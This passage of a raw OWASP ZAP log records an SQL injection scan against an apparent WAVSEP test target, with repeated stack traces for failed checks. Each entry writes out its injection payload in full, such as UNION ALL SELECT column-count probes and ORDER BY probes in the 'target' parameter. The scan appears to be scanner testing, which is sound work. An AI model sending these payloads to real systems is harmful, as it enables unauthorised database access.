location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679562 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679563 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679563 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679564 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679564 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679566 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679566 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679566 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679568 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679568 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 2198#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 2198# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679575 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679575 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 